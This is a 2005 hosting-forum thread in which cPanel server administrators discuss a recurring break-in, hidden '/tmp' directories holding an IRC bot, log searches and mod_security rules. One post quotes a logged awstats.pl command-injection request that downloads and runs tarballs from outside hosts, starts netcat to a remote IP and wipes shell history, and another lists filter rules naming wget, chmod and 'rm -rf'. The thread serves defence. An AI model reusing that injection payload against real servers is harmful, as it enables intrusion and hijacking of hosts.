The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Crazy hacker.......

Discussion in 'General Discussion' started by amal, Apr 8, 2005.

  1. amal

    amal Well-Known Member

    Joined:
    Nov 22, 2003
    Messages:
    155
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Hi,

    I have a really weird problem.....

    He hosted ( via hack ) his domain on one of our cpanel servers .. the place where he hosted his site was /usr/local/apache/.../ . I removed him from the server and he went and hosted it in one of my different servers...( actually, he tried it on many servers with that ip series.... ). Now, after removing him several times, he has switched to another hosts... I have been watching this site, and it's switching servers very easily.... the website in question is http://hothackers.com

    I really don't understand, how he edits the httpd.conf ( permission 644, owned by root ) file and add entries which he like... The kernel on our server is 2.4.29-ow1 ( The open wall kernel is meant to be a secure one )... And the kernels are statically compiled( monolithic kermnel ) to avoid module level hacking. He has hacked both the Redhat9 and CentOS servers..... cpanel is updated to the latest stable version... Any idea how he's hacking , and how it can be prevented? At the meantime, he doesn;t have any problem hosting his site for free on anywhere he wants... Luckily, he is not with me anymore... he seems to be on a server hosted by theplanet....

    And all his files are under the ownership of bin....

    Anyone had any such experiences before? Any ideas would be greatly appreciated....

    Regards,
    Amal.
     
  2. anoopkumar

    anoopkumar Member

    Joined:
    Feb 15, 2004
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    India
    They hacked my server too..

    ohhhhh, hothackers... I remember them very much... They hacked my server as well... No idea how they are doing it
     
  3. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Check your domlogs

    They get in mostly from holes in PHP aps
    They then install their own shell app and god know what.

    Also check your tmp directories for stuff like .../

    I suggest you run securetmp which helps
     
  4. iCARus

    iCARus Well-Known Member

    Joined:
    Apr 8, 2003
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Hmmm... we found 1 wierd dirs like:

    drwx------ 3 nobody nobody 1024 May 1 06:10 .\ /

    How to delete that? We have securetmp from the first day and nothing hacked. But this one is wierd.
     
  5. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Such files/directories are usually best deleted through sFTP - if you're not careful you can end up wiping your whole server.
     
  6. Jasonbd

    Jasonbd Member

    Joined:
    Jan 4, 2004
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Texas
    If this is the only directory in /tmp you could hit tab and it will put it in the shell prompt. I have also been able to do cd ".\ /". I usually just rename the directory then go in there to see what is there and then remove it.
     
  7. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    It can be deleted and it's where the main hacker files are located.

    It may have a space before or after the name. They sometimes place several spaces after the name.

    So you have .../[space] or what ever ---- (where [space] is a space)

    Just do rm -fr .../

    Make sure you get the line right else you may erase the wrong thing.

    Try the cd command first - if you can cd to it then you know how to delete it.

    You need to do three things fast.
    First get rid of his files.
    Reboot the server right after you delete the files.
    Last you need to find the PHP app he used to get in.

    This is the hard part.

    Look for stuff like mydomain.com/help.php?q=http://somedomain

    The hacker passes a domain to the app and it invokes the download of the tools the hacker uses which winds up in your tmp directory.

    If you didn't use the script securetmp then you may find these files in usr/tmp or var/tmp as well

    Securetmp makes it harder for them to do this stuff but is not 100% and a good hacker can get around it.

    Vin
     
  8. iCARus

    iCARus Well-Known Member

    Joined:
    Apr 8, 2003
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Hello all.

    Yes, it is "/tmp/..\[space]/" and files in it:

    Code:
    drwx------    3 nobody   nobody       1024 May  1 06:10 ./
    drwxrwxrwt    7 root     root       406528 May  7 08:40 ../
    -rw-r--r--    1 nobody   nobody        307 Mar 27 11:50 1.users
    -rw-r--r--    1 nobody   nobody        393 Mar 27 11:51 2.users
    -rw-r--r--    1 nobody   nobody        393 Mar 27 11:52 3.users
    -rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
    -rw-r--r--    1 nobody   nobody         34 Aug 15  2004 LinkEvents
    -rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
    drwx------    2 nobody   nobody       1024 May  1 06:10 randfiles/
    -rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
    -rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
    
    and directory in "/tmp/\[space]./"

    Code:
    drwx------    3 nobody   nobody       1024 May  7 01:21 ./
    drwxrwxrwt    7 root     root       406528 May  7 08:44 ../
    -rw-r--r--    1 nobody   nobody        608 May  7 00:00 1.users
    -rw-r--r--    1 nobody   nobody        607 May  7 00:00 2.users
    -rw-r--r--    1 nobody   nobody        610 May  7 00:00 3.users
    -rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
    -rw-r--r--    1 nobody   nobody      82057 May  7 00:00 JoJo.seen
    -rw-r--r--    1 nobody   nobody       2706 May  5 19:51 LinkEvents
    -rw-r--r--    1 nobody   nobody       1033 May  7 00:00 mech.levels
    -rw-------    1 nobody   nobody          5 May  2 12:25 mech.pid
    -rw-r--r--    1 nobody   nobody       1349 May  7 00:00 mech.session
    -rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
    drwx------    2 nobody   nobody       1024 May  7 01:21 randfiles/
    -rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
    -rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
    -rw-r--r--    1 nobody   nobody      79359 May  7 00:00 TaKe.seen
    -rw-r--r--    1 nobody   nobody      82548 May  7 00:00 ToTo.seen
    
    Anyone knows anything about it ? How to find user accoutn from where this was created ? It looks like some bot. Hmm :(
     
    #8 iCARus, May 7, 2005
    Last edited: May 7, 2005
  9. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Do you have Chkrootkit and RKhunter installed on your server? Do you also have mod_security?

    You need to secure your server before it is too late.
     
  10. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Delete the directory and files

    run the script sercuretmp - this will help

    He is using your server to spread a virus by sending emails out

    You need to now find out how he got in.

    Run these commands in shell and look for any refference to tmp

    cd /usr/local/apache/domlogs

    grep "/tmp" *;grep Wget *;grep wget *

    You can run them one at a time like grep "/tmp" * if you get too much output or send the output to a file.

    You will see something like somefile.php?q=some_url
    The URL for some_url is another infected server
    I would send them an email to notify them their server has been hacked.

    Hackers use your server to A: break into other servers B: launch attacks or send virus emails out to hundreds of thousands.

    There should be a government agency to crack down on these people but there is none.
    Over time they will get better at hacking and it will create a major problem for the internet.
    Most hackers are just in the learning stages at this point - thank god for that.

    When they become pros you will have little defense and maybe no defense.

    Vin
     
  11. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Forgot one point - after you delete his files re-boot your server to remove any apps from memory!!!

    Very important

    Vin
     
  12. iCARus

    iCARus Well-Known Member

    Joined:
    Apr 8, 2003
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Thank you all for replies...

    1. we have installed Chkrootkit and RKhunter and everything looks ok
    2. if we try to look into domlogs we get error "-bash: /bin/grep: Argument list too long" ...is there any other way to look into over 100 logs ?
    3. we deleted created dirs in /tmp
    4. from the first day we use /tmp secured with securetmp
     
  13. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    you should be able to run the commands one by one.

    grep "/tmp" *

    grep wget *

    grep Wget *

    The first one will most likely show the most info on your hacker.

    RKhunter is good to have but it shows false alarms for a few things.

    You can also run this:

    find / -type d -name ".*" -print

    It will search your whole hard drive for funky entries
    You will get many show up like ./foldername and some files that begin with a dot.
    Those are normal - just look for ones that are not normal looking.

    Vin
     
  14. anup123

    anup123 Well-Known Member

    Joined:
    Mar 29, 2004
    Messages:
    897
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    This Planet
    I see a frequent appearances of these in domlogs:

    /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066.221.209.161%2065000%3bwget%20excalibur.go.ro%2ffirewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bhistory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-"

    i do not have awstats activated. This happens on 2 domains very frequently.

    406 because of mod_sec

    and it's all coming from cihost ip : 66.221.200.58

    Anup
     
  15. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Might want to add

    SecFilter "tar/x20"
    SecFilter "go.ro"
    SecFilter "chmod/x20"
    SecFilter "wget"
    SecFilter "rm/x20-rf"

    This should help, of course, make sure mod_security is active on servers, also remove that script, and when the process is running, use ps -u nobody to get the pid, then go to /proc/(pid) and ls -al. You may see some virtual linked files to where the files are, usually /dev/shm, or /tmp, sometimes /var/spool i've seen, sometimes even /usr/local/apache/proxy, also cat the process's enviroment, might be able to pull a directory from there.

    Also, this shouldn't cause any issues with regular sites, seems to be using Awstats exploit via script, or he's just uploading a script and calling it that

    SecFilter "awstats.pl"

    Since people should be acessing Awstats via Cpanel regardless shouldnt cause any issues.

    Thanks,
    Kris
    Kris@HostMerit.com
     
Loading...

Share This Page